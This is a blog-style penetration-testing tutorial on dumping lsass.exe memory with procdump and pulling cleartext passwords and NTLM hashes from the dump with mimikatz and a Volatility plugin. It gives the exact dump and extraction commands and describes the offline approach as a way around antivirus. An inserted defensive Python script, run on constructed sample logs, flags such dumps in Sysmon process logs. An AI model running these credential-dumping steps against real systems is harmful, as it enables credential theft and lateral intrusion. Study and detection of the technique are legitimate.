Using Mimikatz to get cleartext passwords from an offline memory dump

AliBawazeEer
Apr 11, 2018


Requirements:
new version of Kali
mimikatz: wget https://raw.githubusercontent.com/dfirfpi/hotoloti/master/volatility/mimikatz.py

This applies in case you found an offline dump or were able to dump the lsass process using procdump.

The technique can be used in pentesting to obtain passwords in clear text from a server without running “malicious” code on it, since mimikatz is flagged by most AV. In this way we avoid having to deal with antivirus evasion techniques and other headaches.

On the other hand, Procdump is a tool developed by Mark Russinovich that will allow us to dump the memory space of a process to a file.

Note: taking the dump requires system privileges.

For 32 bits:
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp
For 64 bits:
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp

Download the generated lsass.dmp file.
Launch mimikatz alpha against the lsass.dmp file with the commands:

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords full
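
From the defender's side, the procdump invocation shown above is visible in process-creation logging. The following is an added example, not part of the original post: a Python check that flags command lines combining the -ma switch with an lsass target. The JSON field names follow Sysmon Event ID 1, the sample records are constructed, and treating /ma the same as -ma is an assumption.

```python
import json
import shlex

# Constructed sample records (not real logs), shaped like Sysmon Event ID 1
# (process creation) fields exported one JSON object per line.
SAMPLE_EVENTS = r'''
{"UtcTime": "2018-04-11 10:02:11", "User": "NT AUTHORITY\\SYSTEM", "CommandLine": "C:\\temp\\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp"}
{"UtcTime": "2018-04-11 10:05:40", "User": "LAB\\admin", "CommandLine": "\"C:\\Sysinternals\\procdump64.exe\" /MA LSASS.EXE C:\\dumps\\out.dmp"}
{"UtcTime": "2018-04-11 10:07:02", "User": "LAB\\admin", "CommandLine": "C:\\temp\\procdump.exe -accepteula -ma w3wp.exe w3wp.dmp"}
{"UtcTime": "2018-04-11 10:09:15", "User": "LAB\\alice", "CommandLine": "notepad.exe C:\\notes\\lsass-ma.txt"}
{"UtcTime": "2018-04-11 10:11:33", "User": "LAB\\alice", "CommandLine": "tasklist /fi \"imagename eq lsass.exe"}
'''

TARGETS = {"lsass", "lsass.exe"}  # process name as typed on the command line
DUMP_FLAGS = {"ma"}               # the full-dump switch used in this post

def tokenize(command_line):
    """Split a Windows command line, keeping backslashes literal."""
    try:
        return shlex.split(command_line, posix=False)
    except ValueError:            # unbalanced quote, e.g. a truncated log field
        return command_line.split()

def is_lsass_dump(command_line):
    """True when the arguments carry both a -ma (or /ma) switch and an lsass target."""
    args = [t.strip('"').lower() for t in tokenize(command_line)[1:]]
    flags = {a[1:] for a in args if a[:1] in ("-", "/")}  # "/" form is an assumption
    names = {a.replace("/", "\\").rsplit("\\", 1)[-1] for a in args}
    return bool(flags & DUMP_FLAGS) and bool(names & TARGETS)

def find_lsass_dumps(json_lines):
    """Return the events whose CommandLine matches, in input order."""
    hits = []
    for line in json_lines.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        if is_lsass_dump(event.get("CommandLine") or ""):
            hits.append(event)
    return hits

if __name__ == "__main__":
    for e in find_lsass_dumps(SAMPLE_EVENTS):
        print(e["UtcTime"], e["User"], e["CommandLine"])
```

Command-line matching is one signal only; process-access telemetry on lsass.exe is the usual companion to it.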

In case of a full memory dump you can follow this reference, which I did not try myself but should work in VirtualBox: http://wiki.yobi.be/wiki/RAM_analysis#RAM_dump_with_VirtualBox:_via_pgmphystofile

-------

Now let's dig into volatility and mimikatz.

By default volatility does not include mimikatz, so you need to navigate to its directory and add the plugin:

  1. cd /usr/share/volatility
  2. mkdir plugins
  3. cd plugins
  4. wget https://raw.githubusercontent.com/dfirfpi/hotoloti/master/volatility/mimikatz.py
  5. apt-get install python-crypto
  6. volatility --plugins=/usr/share/volatility/plugins --profile=Win7SP0x86 -f halomar.dmp mimikatz

Here, halomar.dmp is the memory dump file.

If you need the NTLM hash:

volatility --plugins=/usr/share/volatility/plugins --profile=Win7SP0x86 -f ~/Desktop/ctf/halomar.dmp hashdump

That’s it. I did learn something new, hope you do.
